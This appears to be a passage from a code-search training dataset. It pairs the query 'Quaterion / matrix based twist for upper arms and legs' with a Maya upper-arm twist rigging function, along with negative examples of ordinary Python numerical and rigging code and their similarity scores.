self.grep_param_names(\".*\" + s):\r\n if not (i in currently_constrained):\r\n to_make_positive.append(i)\r\n if len(to_make_positive):\r\n self.constrain_positive(np.asarray(to_make_positive))", "def pk_constrained(self, snr=30, headroom = 0):\n # Initialize\n self.pk = np.zeros((self.n_waves, len(self.controls.k0)), dtype=np.csingle)\n # loop over frequencies\n bar = tqdm(total = len(self.controls.k0), desc = 'Calculating Constrained Optim.')\n for jf, k0 in enumerate(self.controls.k0):\n # get the scaled version of the propagating directions\n k_vec = k0 * self.dir\n # Form the sensing matrix\n h_mtx = np.exp(1j*self.receivers.coord @ k_vec.T)\n H = h_mtx.astype(complex) # cvxpy does not accept floats, apparently\n # measured data\n pm = self.pres_s[:,jf].astype(complex)\n # Performing constrained optmization cvxpy\n x_cvx = cp.Variable(h_mtx.shape[1], complex = True) # create x variable\n # Create the problem\n epsilon = 10**(-(snr-headroom)/10)\n problem = cp.Problem(cp.Minimize(cp.norm2(x_cvx)**2),\n [cp.pnorm(pm - cp.matmul(H, x_cvx), p=2) <= epsilon])\n problem.solve(solver=cp.SCS, verbose=False)\n self.pk[:,jf] = x_cvx.value\n bar.update(1)\n bar.close()", "def hardsigmoid(input, inplace=False):\n return FunctionLib.apply(\n 'HardSigmoid', input.device, [input],\n outputs=[input if inplace else None], alpha=1. / 6., beta=0.5)", "def set_enzyme_constraint(model, reaction_kcat_mw, lowerbound, upperbound):\n coefficients = dict()\n for rxn in model.reactions:\n if rxn.id in reaction_kcat_mw.index:\n coefficients[rxn.forward_variable] = 1 / \\\n float(reaction_kcat_mw.loc[rxn.id, 'kcat_MW'])\n constraint = model.problem.Constraint(0, lb=lowerbound, ub=upperbound)\n model.add_cons_vars(constraint)\n model.solver.update()\n constraint.set_linear_coefficients(coefficients=coefficients)\n return model", "def RestrictionRequireProvideDependency(self, alphaCompId, betaCompId, alphaCompIdInstances, betaCompIdInstances):\n #self.problem.logger.debug(\"RestrictionRequireProvideDependency: alphaCompId={}, betaCompId={}, alphaCompIdInstances={}, \"\n # \"betaCompIdInstances={}\".format(alphaCompId, betaCompId, alphaCompIdInstances, betaCompIdInstances))\n\n if self.solverTypeOptimize:\n\n bvars1 = [(self.a[alphaCompId * self.nrVM + j], alphaCompIdInstances) for j in range(self.nrVM)]\n bvars2 = [(self.a[betaCompId * self.nrVM + j], -betaCompIdInstances) for j in range(self.nrVM)]\n bvars = bvars1 + bvars2\n\n self.solver.add(PbLe( [x for x in bvars], 0))\n else:\n self.__constMap[\"LabelRequireProvide: \" + str(self.labelIdx)] = \\\n alphaCompIdInstances * sum([If(self.a[alphaCompId * self.nrVM + j], 1, 0) for j in range(self.nrVM)]) \\\n <= \\\n betaCompIdInstances * sum([If(self.a[betaCompId * self.nrVM + j], 1, 0) for j in range(self.nrVM)])\n self.solver.assert_and_track(\n alphaCompIdInstances * sum([If(self.a[alphaCompId * self.nrVM + j], 1, 0) for j in range(self.nrVM)]) <=\n betaCompIdInstances * sum([If(self.a[betaCompId * self.nrVM + j],1, 0) for j in range(self.nrVM)]), \"LabelRequireProvide: \" + str(self.labelIdx))\n self.labelIdx += 1", "def pre_instance_ip_create(self, resource_dict):\n pass", "def add_constraint(self, constraint):\n self.add_constraint_sig(\n ConstraintSignature.from_constraint(constraint))", "def add_constraint(self, name, constraint_obj, dofidxs, Xidxs=()):\n logger = logging.getLogger(__name__)\n logger.debug('Adding constraint {} to dofs {} and nodes {}'.format(name, dofidxs, Xidxs))\n\n # Create new rows for constraints_df\n df = pd.DataFrame(\n {'name': name, 'constraint_obj': constraint_obj,\n 'dofidxs': [np.array([dofidxs], dtype=np.intp).reshape(-1)],\n 'Xidxs': [np.array([Xidxs], dtype=np.intp).reshape(-1)]},\n )\n\n self._constraints_df = pd.concat([self._constraints_df, df], ignore_index=True)\n constraint_obj.after_assignment(dofidxs)\n\n self._update_flag = True\n \n return", "def add_constraint(self, constraint, problem):\n problem += constraint", "def switch_setup(params, rig, ik_joints):\n\n # Duplicate for bind skeleton\n skeleton = [x.name() for x in params['ikSkeleton']]\n bind_skeleton = cmds.duplicate(skeleton, n=skeleton[0] + '_bnd_0')\n #bind_skeleton\n\n # Hide all attribute on Controller\n fkikcontrol = params['fkIkSwitch'].name()\n attrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v']\n for i in attrs:\n cmds.setAttr('{node}.{attr}'.format(node=fkikcontrol, attr=i), k=False, cb=False)\n\n # Create FK/IK Switch attributes\n cmds.addAttr(fkikcontrol, sn='FKIKBlend', at='float', min=0, max=1, dv=0, k=True)\n cmds.addAttr(fkikcontrol, sn='AutoVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='FKVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='IKVis', at='bool', dv=1, k=True)\n\n # create control offset transforms\n # par = cmds.listRelatives(fkikcontrol, parent=True)\n # buf = create_offset_transform(fkikcontrol, BUF)\n # cmds.parent(fkikcontrol, buf)\n # if par: cmds.parent(buf, par[0])\n\n # Parent Skeleton to rig group\n ik_skeleton = [x.name() for x in params['ikSkeleton']]\n fk_skeleton = [x.name() for x in params['fkSkeleton']]\n cmds.parent(ik_skeleton[0], rig['rigGroup'])\n cmds.parent(fk_skeleton[0], rig['rigGroup'])\n\n # Constraint Bind Skeleton\n fk_ik_finish(ik_joints, bind_skeleton, params)", "def _add_graph_to_env_with_assert_soft(self, env, encoding):\n cost = env.declare_fun(\"cost\", Environment.REAL)\n\n opts = {\n \"id\" : cost\n }\n\n # add nodes\n uids = self._nodes.keys()\n uids.sort()\n for node_uid in uids:\n node = self._nodes[node_uid]\n if (node.get_cost() != 0):\n node.add_node_to_env(env, encoding, opts)\n\n # add edges\n uids = self._edges.keys()\n uids.sort()\n for edge_uid in uids:\n edge = self._edges[edge_uid]\n if (edge.get_cost() != 0):\n edge.add_edge_to_env(env, encoding, opts)\n\n return cost" ]
[ "0.5469389", "0.531737", "0.52888745", "0.51781154", "0.50092465", "0.49953595", "0.49701515", "0.4952075", "0.49448365", "0.49093467", "0.49027547", "0.4884955", "0.4834274", "0.47601178", "0.47214177", "0.46724012", "0.4648716", "0.46426857", "0.4633451", "0.46300042", "0.46296412", "0.4621398", "0.46171993", "0.45797682", "0.45698234", "0.4551361", "0.4544794", "0.45422685", "0.45376104", "0.45184177", "0.4506468", "0.45009637", "0.4496136", "0.4496136", "0.44946757", "0.44938493", "0.44897267", "0.44862762", "0.44700927", "0.44500896", "0.4448092", "0.44381794", "0.44330004", "0.44305578", "0.442912", "0.4427677", "0.44256943", "0.44236663", "0.44236663", "0.4422735", "0.44025669", "0.43981457", "0.43956965", "0.43945152", "0.43853974", "0.43836325", "0.43816638", "0.4378772", "0.4376063", "0.43685094", "0.43475145", "0.43471542", "0.4343365", "0.433937", "0.43392196", "0.4338818", "0.43358377", "0.43309873", "0.43257737", "0.43217847", "0.43204236", "0.43196267", "0.43188182", "0.4307706", "0.43008593", "0.42735362", "0.42703828", "0.42690527", "0.42618665", "0.42501935", "0.42472064", "0.4246659", "0.42464435", "0.4244499", "0.42437243", "0.42386106", "0.423683", "0.42354515", "0.42308676", "0.4230076", "0.42295685", "0.42259663", "0.4222009", "0.42174864", "0.4215837", "0.42073435", "0.42004547", "0.41973498", "0.4197306", "0.41959858" ]
0.7518777
0
Quaterion / matrix based twist for upper arms and legs.
def upper_twist(shoulder_jnt, up_arm_ik_jnt, lo_arm_ik_jnt, up_arm_jnt, lo_arm_jnt, up_arm_twist_jnts): # Create a group that does not rotate and parent under the ik arm parent (shoulder) stable_reader_grp = utils.create_node('transform', n=up_arm_ik_jnt+'_stable_reader', p=up_arm_ik_jnt) # Create a grp that will rotate with ik arm twist_reader_grp = utils.create_node('transform', n=up_arm_ik_jnt+'_twist_reader', p=up_arm_ik_jnt) twist_driver_grp = utils.create_node('transform', n=up_arm_ik_jnt+'_twist', p=twist_reader_grp) mc.parent(stable_reader_grp, shoulder_jnt) mc.addAttr(twist_reader_grp, ln='twist', k=1) # Now set up mult matrix and decomp nodes to extract the twist between the two nodes mult_mtx = mc.createNode('multMatrix') decomp_mtx = mc.createNode('decomposeMatrix') quat_to_euler = mc.createNode('quatToEuler') mc.connectAttr(stable_reader_grp+'.worldInverseMatrix', mult_mtx+'.matrixIn[1]') mc.connectAttr(twist_reader_grp+'.worldMatrix', mult_mtx+'.matrixIn[0]') mc.connectAttr(mult_mtx+'.matrixSum', decomp_mtx+'.inputMatrix') mc.connectAttr(decomp_mtx+'.outputQuatX', quat_to_euler+'.inputQuatX') mc.connectAttr(decomp_mtx+'.outputQuatW', quat_to_euler+'.inputQuatW') utils.connect_negative(quat_to_euler+'.outputRotateX', twist_reader_grp+'.twist') mc.connectAttr(twist_reader_grp+'.twist', twist_driver_grp+'.rx') # Connect joints mc.parentConstraint(twist_driver_grp, up_arm_jnt, mo=1) mc.parentConstraint(lo_arm_ik_jnt, lo_arm_jnt, mo=1) div = 1.0 / (len(up_arm_twist_jnts)) mdl = mc.createNode('multDoubleLinear') mc.setAttr(mdl+'.input1', div) mc.connectAttr(quat_to_euler+'.outputRotateX', mdl+'.input2') for i, joint in enumerate(up_arm_twist_jnts[:-1]): mc.connectAttr(mdl+'.output', joint+'.rx') mc.orientConstraint(up_arm_ik_jnt, up_arm_twist_jnts[-1], mo=1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lower_twist(lo_arm_ik_jnt, wrist_ik_jnt, lo_arm_jnt, lo_arm_twist_jnts, wrist_jnt=None):\n\n # Create a group that does not rotate and parent under the ik arm parent (shoulder)\n stable_reader_grp = utils.create_node('transform', n=lo_arm_ik_jnt+'_stable_reader', p=lo_arm_ik_jnt)\n\n # Create a grp that will rotate with ik arm\n twist_reader_grp = utils.create_node('transform', n=lo_arm_ik_jnt+'_twist_reader', p=lo_arm_ik_jnt)\n mc.addAttr(twist_reader_grp, ln='twist', k=1)\n\n mc.delete(mc.pointConstraint(wrist_ik_jnt, twist_reader_grp))\n mc.parent(twist_reader_grp, wrist_ik_jnt)\n\n # Now set up mult matrix and decomp nodes to extract the twist between the two nodes\n mult_mtx = mc.createNode('multMatrix')\n decomp_mtx = mc.createNode('decomposeMatrix')\n quat_to_euler = mc.createNode('quatToEuler')\n\n mc.connectAttr(stable_reader_grp+'.worldInverseMatrix', mult_mtx+'.matrixIn[1]')\n mc.connectAttr(twist_reader_grp+'.worldMatrix', mult_mtx+'.matrixIn[0]')\n mc.connectAttr(mult_mtx+'.matrixSum', decomp_mtx+'.inputMatrix')\n mc.connectAttr(decomp_mtx+'.outputQuatX', quat_to_euler+'.inputQuatX')\n mc.connectAttr(decomp_mtx+'.outputQuatW', quat_to_euler+'.inputQuatW')\n\n utils.connect_negative(quat_to_euler+'.outputRotateX', twist_reader_grp+'.twist')\n\n # Connect joints\n mc.parentConstraint(lo_arm_ik_jnt, lo_arm_jnt, mo=1)\n if wrist_jnt:\n mc.parentConstraint(wrist_ik_jnt, wrist_jnt, mo=1)\n\n div = 1.0 / (len(lo_arm_twist_jnts))\n\n mdl = mc.createNode('multDoubleLinear')\n mc.setAttr(mdl+'.input1', div)\n mc.connectAttr(quat_to_euler+'.outputRotateX', mdl+'.input2')\n\n for i, joint in enumerate(lo_arm_twist_jnts):\n mc.connectAttr(mdl+'.output', joint+'.rx')", "def Areml_eigh(self):\n s,U = LA.eigh(self.Areml(),lower=True)\n i_pos = (s>1e-10)\n s = s[i_pos]\n U = U[:,i_pos]\n return s,U", "def lfunc(x,u):\n return mpc.mtimes(u.T, R, u) + mpc.mtimes((x-goal).T, Q, (x-goal))", "def other_quadrants(self, matrix):\n q2 = deepcopy(matrix)\n q2t = [-1, 1]\n q2f = []\n for j in range(len(q2)):\n list = [q2[j][i] * q2t[i] for i in range(2)]\n dist = self.get_dist(list[0], list[1])\n\n if dist <= self.max_distance:\n list.append(matrix[j][2])\n q2f.append(list)\n\n q3 = deepcopy(matrix)\n q3t = [-1, -1]\n q3f = []\n for j in range(len(q3)):\n list = [q3[j][i] * q3t[i] for i in range(2)]\n dist = self.get_dist(list[0], list[1])\n\n if dist <= self.max_distance:\n list.append(matrix[j][2])\n q3f.append(list)\n\n q4 = deepcopy(matrix)\n q4t = [1, -1]\n q4f = []\n for j in range(len(q3)):\n list = [q4[j][i] * q4t[i] for i in range(2)]\n dist = self.get_dist(list[0], list[1])\n\n if dist <= self.max_distance:\n list.append(matrix[j][2])\n q4f.append(list)\n\n return q2f, q3f, q4f", "def illuminator_of_elfes():\n\n\t# Alpha - simplified by taking out the i by multiplying the outerproduct by 2i\n\talpha1i = np.matrix([[0, 0, 0, 2], [0, 0, 2, 0], [0, -2, 0, 0], [-2, 0, 0, 0]])\n\talpha2i = np.matrix([[0, 2, 0, 0], [-2, 0, 0, 0], [0, 0, 0, 2], [0, 0, -2, 0]])\n\talpha3i = np.matrix([[0, 0, 2, 0], [0, 0, 0, -2], [-2, 0, 0, 0], [0, 2, 0, 0]])\n\n\t# Betas - simplified by taking out the i by multiplication of outerprod by 2i\n\tbeta1i = np.matrix([[0, 0, 0, 2], [0, 0, -2, 0], [0, 2, 0, 0], [-2, 0, 0, 0]])\n\tbeta2i = np.matrix([[0, 0, 2, 0], [0, 0, 0, 2], [-2, 0, 0, 0], [0, -2, 0, 0]])\n\tbeta3i = np.matrix([[0, 2, 0, 0], [-2, 0, 0, 0], [0, 0, 0, -2], [0, 0, 2, 0]])\n\n\t# print(\"alpha 1\")\n\t# print(alpha1i)\n\t# print(\"\")\n\t# print(\"alpha 2\")\n\t# print(alpha2i)\n\t# print(\"\")\n\t# print(\"alpha 3\")\n\t# print(alpha3i)\n\t# print(\"\")\n\t# print(\"beta 1\")\n\t# print(beta1i)\n\t# print(\"\")\n\t# print(\"beta 2\")\n\t# print(beta2i)\n\t# print(\"\")\n\t# print(\"beta 3\")\n\t# print(beta3i)\n\t# print(\"\")\n\n\t# abperm_comb = [ np.multiply(alpha1i,-1), np.multiply(alpha2i,-1), np.multiply(alpha3i,-1), np.multiply(beta1i,-1), np.multiply(beta2i,-1), np.multiply(beta3i,-1)]\n\n\tabperm_comb = [alpha1i, alpha2i, alpha3i, beta1i, beta2i, beta3i]\n\treturn abperm_comb", "def lap_mat(self):", "def transform_traj(traj, ego_HTM, th):\r\n traj_pos = np.concatenate([traj[:, :2], np.ones([len(traj), 1])], axis=1)\r\n traj_pos = np.matmul(ego_HTM, traj_pos.transpose()).transpose()\r\n traj_th = traj[:, 2] - th\r\n traj_pos[:, 2] = traj_th\r\n return traj_pos", "def fkine(robot, q):\n\n q = mat(q)\n n = robot.n\n if numrows(q)==1 and numcols(q)==n:\n t = robot.base\n for i in range(0,n):\n t = t * robot.links[i].tr(q[0,i])\n t = t * robot.tool\n return t\n else:\n if numcols(q) != n:\n raise Exception('bad data')\n t = []\n for qv in q: # for each trajectory point\n tt = robot.base\n for i in range(0,n):\n tt = tt * robot.links[i].tr(qv[0,i])\n t.append(tt*robot.tool)\n return t", "def Phieqfun(Phibar,DPhieq,lambdas,mus,I,J,g):\n\n PhieqMat=Phibar*np.ones((J,I)) #initialize to flat nightside geopotentiAL\n \n for i in range(I):\n for j in range(J):\n #assume substellar point is (0,0)\n if -np.pi/2<lambdas[i]<np.pi/2: #only force the dayside\n PhieqMat[j,i]=PhieqMat[j,i]+DPhieq*np.cos(lambdas[i])*np.sqrt((1-mus[j]**2)) \n \n return PhieqMat", "def inv_kin(self, xy):\n\n def distance_to_default(q, *args): \n \"\"\"Objective function to minimize\n Calculates the euclidean distance through joint space to the default\n arm configuration. The weight list allows the penalty of each joint \n being away from the resting position to be scaled differently, such\n that the arm tries to stay closer to resting state more for higher \n weighted joints than those with a lower weight.\n \n :param list q: the list of current joint angles\n :returns scalar: euclidean distance to the default arm position\n \"\"\"\n # weights found with trial and error, get some wrist bend, but not much\n weight = [1, 1, 1.3, 1] \n return np.sqrt(np.sum([(qi - q0i)**2 * wi\n for qi,q0i,wi in zip(q, self.q0, weight)]))\n\n def x_constraint(q, xy):\n \"\"\"Returns the corresponding hand xy coordinates for \n a given set of joint angle values [shoulder, elbow, wrist], \n and the above defined arm segment lengths, L\n \n :param list q: the list of current joint angles\n :returns: the difference between current and desired x position\n \"\"\"\n x = ( self.L[0]*np.cos(q[0]) + self.L[1]*np.cos(q[0]+q[1]) + \n self.L[2]*np.cos(q[0]+q[1]+q[2]) + self.L[3]*np.cos(np.sum(q)) ) - xy[0]\n return x\n\n def y_constraint(q, xy): \n \"\"\"Returns the corresponding hand xy coordinates for \n a given set of joint angle values [shoulder, elbow, wrist], \n and the above defined arm segment lengths, L\n \n :param list q: the list of current joint angles\n :returns: the difference between current and desired y position\n \"\"\"\n y = ( self.L[0]*np.sin(q[0]) + self.L[1]*np.sin(q[0]+q[1]) + \n self.L[2]*np.sin(q[0]+q[1]+q[2]) + self.L[3]*np.sin(np.sum(q)) ) - xy[1]\n return y\n\n return scipy.optimize.fmin_slsqp( func=distance_to_default, \n x0=self.q, eqcons=[x_constraint, y_constraint], \n args=(xy,), iprint=0) # iprint=0 suppresses output", "def lie_bracket(self, matrix_a, matrix_b):\n return gs.matmul(matrix_a, matrix_b) - gs.matmul(matrix_b, matrix_a)", "def reverse_quad(q):\n return [q[1], q[0], q[3], q[2]]", "def needwu(A,B,S,d):\n AlignementA=\"\"\n AlignementB=\"\"\n F=matriF(A,B,S,d)\n i=len(A)-1\n j=len(B)-1\n\n while i>0 and j>0:\n score=F[i][j]\n scorediag=F[i-1][j-1]\n scoreup=F[i][j-1]\n scoreleft=F[i-1][j]\n\n if score==(scorediag+S[ind(A[i])][ind(B[j])]):\n AlignementA=A[i]+AlignementA\n AlignementB=B[j]+AlignementB\n i=i-1\n j=j-1\n\n elif score==(scoreleft+d):\n AlignementA=A[i]+AlignementA\n AlignementB=\"-\"+AlignementB\n i=i-1\n\n elif score==(scoreup+d):\n AlignementA=\"-\"+AlignementA\n AlignementB=B[j]+AlignementB\n j=j-1\n\n while i>0:\n AlignementA=A[i]+AlignementA\n AlignementB=\"-\"+AlignementB\n i=i-1\n\n while j>0:\n AlignementA=\"-\"+AlignementA\n AlignementB=B[j]+AlignementB\n j=j-1\n\n return AlignementA, AlignementB", "def test_quaternion_hamilton():\n q_ij = pr.concatenate_quaternions(pr.q_i, pr.q_j)\n assert_array_equal(pr.q_k, q_ij)\n q_ijk = pr.concatenate_quaternions(q_ij, pr.q_k)\n assert_array_equal(-pr.q_id, q_ijk)", "def T(self):\n # TODO - your code here\n transpose = []\n for col in range(self.w):\n new_row = []\n for row in range(self.h):\n new_row.append(self.g[row][col])\n transpose.append(new_row)\n return Matrix(transpose)\n # TODO - your code here", "def Rt(X):\n return X[:2,:2], X[:2, 2]", "def housetriang(A, B):\n m, n = shape(A); r = shape(B)[1] ; A=hstack([A,B]); \n minval = array([n, m - 1]).min()\n for k in range(minval):\n v, A[k, k] = housegen(A[k:m, k])\n v = matrix(reshape(v, (m - k, 1)))\n C = A[k:m, (k+1):(n+r)] ; A[k:m, (k + 1):(n + r)] = C - v*(v.T*C)\n R = triu(A[:, :n]); C = A[:, n:(n + r)]\n return R, C", "def __rmul__(self, other):#标量乘法\n if isinstance(other, numbers.Number):\n pass\n # \n # TODO - your code here\n #\n result = [];\n row_result = [];\n \n for row in self.g:\n row_result = [m*other for m in row];\n result.append(row_result);\n return Matrix(result);", "def getQ(m, t):\n\n Q = []\n for r in range(len(t)):\n qrow = []\n for c in range(len(t)):\n qrow.append(m[t[r]][t[c]])\n Q.append(qrow) \n return Q", "def _transform_coordinates(rectangle, Q=np.matrix(((1, 1), (-1, 1)))):\n return tuple((rectangle[0]*Q).A1), tuple((rectangle[1]*Q).A1)", "def quat2transform(q):\n x, y, z, w = q\n xx2 = 2 * x * x\n yy2 = 2 * y * y\n zz2 = 2 * z * z\n xy2 = 2 * x * y\n wz2 = 2 * w * z\n zx2 = 2 * z * x\n wy2 = 2 * w * y\n yz2 = 2 * y * z\n wx2 = 2 * w * x\n\n rmat = np.empty((3, 3), float)\n rmat[0,0] = 1. - yy2 - zz2\n rmat[0,1] = xy2 - wz2\n rmat[0,2] = zx2 + wy2\n rmat[1,0] = xy2 + wz2\n rmat[1,1] = 1. - xx2 - zz2\n rmat[1,2] = yz2 - wx2\n rmat[2,0] = zx2 - wy2\n rmat[2,1] = yz2 + wx2\n rmat[2,2] = 1. - xx2 - yy2\n\n return rmat", "def sqrtw():\n return Operator([[(1.+1.j)/2,-1.j/np.sqrt(2)],[1./np.sqrt(2),(1.+1.j)/2]])", "def transverse_resonator(Rs, Q, wr, w):\n Rs = _np.array(Rs,ndmin=1,dtype=float)[:,None] # I am using broadcasting\n Q = _np.array(Q, ndmin=1,dtype=float)[:,None]\n wr = _np.array(wr,ndmin=1,dtype=float)[:,None]\n Zt = wr*Rs/(w + 1j*Q*(wr - w**2/wr))\n return Zt.sum(0).flatten()", "def test_align_invert(self):\n al = align(self.amp1, self.amp2, inverse=False)\n\n al_inv = align(self.amp2, self.amp1, inverse=True)\n\n print(al.R)\n print(al_inv.R)\n\n print(al.T)\n print(al_inv.T)", "def leg_tr(tr_leg, tens_list, legs_list, ent_list):\n q_index = [legs.__contains__(tr_leg) for legs in legs_list].index(True,0)\n ax1 = legs_list[q_index].index(tr_leg,0)\n ax2 = legs_list[q_index].index(tr_leg,ax1+1)\n tens_list[q_index] = np.trace(tens_list[q_index], offset=0, axis1=ax1, axis2=ax2)\n legs_list[q_index].remove(tr_leg)\n legs_list[q_index].remove(tr_leg)\n ent_list[tr_leg] = np.array([0])", "def trace(q_1: Qs) -> Qs:\n\n if q_1.rows != q_1.columns:\n raise ValueError(f\"Oops, not a square quaternion series: {q_1.rows}/{q_1.columns}\")\n\n else:\n tr = q_1.qs[0]\n\n for i in range(1, q_1.rows):\n tr = add(tr, q_1.qs[i * (q_1.rows + 1)])\n\n return Qs([tr])", "def relTrace(mat, spinorsize):\n\n top = mat[:spinorsize, :spinorsize]\n bottom = mat[spinorsize:, spinorsize:]\n return 2*(top+bottom)", "def gram_schmidt(mat_a):\n # NOTE: We will use the same variable names as the one in the\n # pseudo code for clarity\n rows_count = mat_a.shape[0]\n\n u = mat_a.copy()\n r = np.zeros_like(u)\n q = np.zeros_like(u)\n for i in range(rows_count):\n u_i = u[:, i]\n r[i, i] = np.linalg.norm(u_i)\n q[:, i] = u_i / r[i, i] if r[i, i] != 0 else 0\n q_i = q[:, i]\n\n r[i, i + 1:] = q_i.T.dot(u[:, i + 1:])\n # np.outer will multiply q_i by each number in r[i, i + 1:], and create\n # a matrix that each column is a result of that multiplication\n u[:, i + 1:] -= np.outer(q_i, r[i, i + 1:])\n\n return q, r", "def upper_tri(A):\n d = pairwise_distances(A,A)\n m = d.shape[0]\n r,c = np.triu_indices(m,1)\n return(d[r,c])", "def calc_quad(self,mw,A0,A1,A2): \n return (A0 + A1 * mw + A2 * mw**2)", "def triquad():\n return Formex(mpattern('12-34'))", "def quatRightMat(q):\n\ts = q[0]\n\tv = q[1:].reshape(-1,)\n\tR = np.zeros((4, 4))\n\tR[0, 0] = s\n\tR[0, 1:] = -v\n\tR[1:, 0] = v\n\tR[1:, 1:] = s*np.eye(3) - skewMat(v)\n\treturn R", "def inverse_kinematics_baxter(TM_W0_Gtool, arm_side):\n\n # Get all constants for the distances and transformations for Baxter\n Constants = constants_baxter.GetConstants()\n L0 = Constants.L0\n L1 = Constants.L1\n L2 = Constants.L2\n L3 = Constants.L3\n L4 = Constants.L4\n L6 = Constants.L6\n L = Constants.L\n h = Constants.h\n H = Constants.H\n LH = Constants.LH\n TM_W0_BL = Constants.TM_W0_BL\n TM_W0_BR = Constants.TM_W0_BR\n TM_BL_0 = Constants.TM_BL_0\n TM_BR_0 = Constants.TM_BR_0\n TM_7_GL = Constants.TM_7_GL\n TM_7_GR = Constants.TM_7_GR\n\n # Apply inverse kinematics for the left arm\n if arm_side == \"left\":\n # Understanding the corresponding TM from the article, this can be solved:\n TM_0_6 = np.dot(np.dot(np.linalg.inv(np.dot(TM_W0_BL,TM_BL_0)), TM_W0_Gtool), np.linalg.inv((TM_7_GR)))\n\n # Find theta1\n PX_0_4 = TM_0_6[0, 3]\n PY_0_4 = TM_0_6[1, 3]\n\n theta1 = math.atan2(PY_0_4, PX_0_4)\n\n # Find theta2\n PZ_0_4 = TM_0_6[2, 3]\n E = 2*LH*(L1 - PX_0_4/math.cos(theta1))\n F = 2*LH*PZ_0_4\n G = (PX_0_4**2)/((math.cos(theta1))**2) + L1**2 + LH**2 - L4**2 + PZ_0_4**2 - 2*L1*PX_0_4/math.cos(theta1)\n\n\n if (E**2 + F**2 - G**2)>0:\n t1 = (-F + math.sqrt(E**2 + F**2 - G**2))/(G - E)\n else: \n t1 = (-F - 0)/(G - E)\n theta2 = 2*math.atan(t1)\n\n # We make only use the real part (img is not significant most of the times)\n #if (E**2 + F**2 - G**2)>0:\n #t2 = (-F - math.sqrt(E**2 + F**2 - G**2))/(G - E)\n #else:\n #t2 = (-F - 0)/(G - E)\n #theta2 = 2*math.atan(t2)\n\n\n\n # Find theta4\n theta4 = math.atan2(-PZ_0_4 - LH*math.sin(theta2), PX_0_4/math.cos(theta1) - L1 - LH*math.cos(theta2)) - theta2\n\n # Find theta5\n DH_0_3 = np.array([[0, 0, 0, theta1],\n [-math.pi/2, L1, 0, theta2],\n [0, LH, 0, theta4 + math.pi/2]])\n\n TM_0_3 = denavit_hartenberg.denavit_hartenberg(DH_0_3, 0)\n R_0_3 = TM_0_3[0:3, 0:3]\n\n R_0_6 = TM_0_6[0:3, 0:3]\n\n R_3_6 = np.dot(np.linalg.inv(R_0_3), R_0_6)\n\n theta5 = math.atan2(R_3_6[2,2], R_3_6[0,2])\n\n # Find theta7\n theta7 = math.atan2(-R_3_6[1,1], R_3_6[1,0])\n\n\n # Find theta6\n theta6 = math.atan2(R_3_6[1,0]/math.cos(theta7), -R_3_6[1,2])\n\n\n return [theta1, theta2, theta4, theta5, theta6, theta7]", "def approx_shoulders(upper_body_roi):\n height = upper_body_roi.shape[0]; width = upper_body_roi.shape[1]\n return (int(width / 6), int((height / 4) * 3)), (int((width / 6) * 5), int((height / 4) * 3))", "def triangulate_analytic(self, x1,y1,r1,x2,y2,r2,x3,y3,r3):\n gamma=(r1**2+x2**2+y2**2-x1**2-y1**2-r2**2)/(float(2.0*(x2-x1)))-x1\n Lambda=(y1-y2)/float(x2-x1)\n y_plus=(-2.0*(gamma*Lambda-y1)+np.sqrt(4*(gamma*Lambda-y1)**2-4*(Lambda**2+1)*(gamma**2+y1**2-r1**2)))/float(2*(Lambda**2+1))\n y_minus=(-2.0*(gamma*Lambda-y1)-np.sqrt(4*(gamma*Lambda-y1)**2-4*(Lambda**2+1)*(gamma**2+y1**2-r1**2)))/float(2*(Lambda**2+1))\n x_plus=gamma+x1+(Lambda*y_plus)\n x_minus=gamma+x1+(Lambda*y_minus)\n difference_plus=(x_plus-x3)**2+(y_plus-y3)**2-r3**2\n difference_minus=(x_minus-x3)**2+(y_minus-y3)**2-r3**2\n if abs(difference_minus) < abs(difference_plus):\n print \"Difference minus\", difference_minus\n print x_minus, y_minus\n return x_minus, y_minus, difference_minus\n else:\n print \"Difference plus\", difference_plus\n print x_plus, y_plus\n return x_plus, y_plus, difference_plus", "def make_sq(mlat, dAB, *J):\n if (len(J)!=4):\n print(\"Number of paramaters are exceeded 5!\")\n NN = 2*mlat\n \n tau = np.zeros((NN,NN), dtype=complex)\n h = np.zeros((NN,NN), dtype=complex)\n \n for i in range(mlat-1):\n if (i%2==0):\n h[i,i] = dAB/2. # on-site energy\n h[mlat+i,mlat+i] = -dAB/2. # on-site energy \n h[i, mlat+i] = J[0]\n h[i, i+1] = J[1]\n h[mlat+i, mlat+i+1] = J[3]\n #\n tau[mlat+i, i] = J[2]\n elif (i%2==1):\n h[i,i] = -dAB/2. # on-site energy\n h[mlat+i,mlat+i] = dAB/2. # on-site energy \n h[i, mlat+i] = J[2]\n h[i, i+1] = J[3]\n h[mlat+i, mlat+i+1] = J[1]\n #\n tau[mlat+i, i] = J[0]\n\n # End of loop over lattice sites\n\n # The upper edge site\n if (mlat-1 % 2==0):\n h[mlat-1, mlat-1] = dAB/2. # on-site energy\n h[NN-1,NN-1] = -dAB/2. # on-site energy \n h[mlat-1, NN-1] = J[0]\n #\n tau[NN-1, mlat-1] = J[2]\n elif (mlat-1 % 2==1):\n h[mlat-1, mlat-1] = -dAB/2. # on-site energy\n h[NN-1,NN-1] = dAB/2. # on-site energy \n h[mlat-1, NN-1] = J[2]\n #\n tau[NN-1, mlat-1] = J[0] \n \n h = h + h.conj().T # make it hermitian\n return h, tau", "def _motion_a(self, lb: np.ndarray, ub: np.ndarray) -> np.ndarray:\n\n r1 = r.generate_uniform_random_number()\n motion = self.gamma * r1 * (np.expand_dims(ub, -1) - np.expand_dims(lb, -1))\n\n return motion", "def hadamard_multiplication(M, Y):\n middle_index = int(M.shape[0] / 2)\n M_quarter = M[:middle_index, :middle_index]\n Y_top = Y[:middle_index]\n Y_bot = Y[middle_index:]\n\n A = M_quarter @ Y_top\n B = M_quarter @ Y_bot\n\n U = np.concatenate((A+B, A-B))\n\n return U", "def _mps_expectation(self, RL, RR, A, Ac):\n T1 = np.tensordot(RL, A, axes=(1, 0))\n T2 = np.tensordot(T1, RR, axes=(2, 0))\n return np.tensordot(T2, Ac, axes=((0, 1, 2), (0, 1, 2)))", "def gram_schmidt(basis):\n orthog = np.array([None for _ in basis])\n mu = np.array([[None for _ in basis] for _ in basis])\n \n orthog[0] = basis[0]\n\n for i in range(1, len(basis)):\n for j in range(i):\n mu[i][j] = np.dot(basis[i], 